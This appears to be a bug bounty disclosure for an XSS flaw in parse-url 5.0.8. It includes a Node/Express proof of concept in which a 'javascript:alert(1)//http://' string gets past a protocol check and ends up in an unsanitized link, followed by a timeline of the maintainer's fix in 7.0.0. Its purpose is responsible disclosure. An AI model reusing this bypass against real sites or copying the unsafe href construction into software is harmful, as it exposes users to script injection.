Cross Site Scripting via Improper Input Validation in ionicabizau/parse-url


Reported on

Jun 7th 2022


The parse-url The 5.0.8 version of the parser does not check url characters between protocols. This causes spoofing of the javascript protocol itself.

Proof of Concept

const parseUrl = require("parse-url");
const express = require('express');
const app = express();

parsed = parseUrl("javascript:alert(1)//http://localhost");

app.get('/', (req, res) => {
    if (parsed.protocol !== "javascript") {
        res.send("<a href=\'" + parsed.href + "\'>CLICK ME!</a>")


In general, the above express code forbids the javascript protocol. However, you can spoof this using the double url scheme

output console.log(parsed);
  protocols: [ 'javascript:alert(1)//http' ],
  protocol: 'javascript:alert(1)//http',
  port: null,
  resource: 'localhost',
  user: '',
  pathname: '',
  hash: '',
  search: '',
  href: 'javascript:alert(1)//http://localhost',
  query: [Object: null prototype] {}
output : document in browser
<a href="javascript:alert(1)//http://localhost">CLICK ME!</a>


Through this vulnerability, an attacker is capable to execute malicious scripts.

We are processing your report and will contact the ionicabizau/parse-url team within 24 hours. a year ago
We have contacted a member of the ionicabizau/parse-url team and are waiting to hear back a year ago
Pocas modified the report
a year ago
We have sent a follow up to the ionicabizau/parse-url team. We will try again in 7 days. a year ago
We have sent a second follow up to the ionicabizau/parse-url team. We will try again in 10 days. a year ago
a year ago


Hi there! Sorry for the late reply and thank you for this report. I am working on fixing this.

Ionică Bizău (Johnny B.) validated this vulnerability a year ago
Pocas has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Ionică Bizău (Johnny B.) marked this as fixed in 7.0.0 with commit 21c72a a year ago
Ionică Bizău (Johnny B.) has been awarded the fix bounty
This vulnerability will not receive a CVE
to join this conversation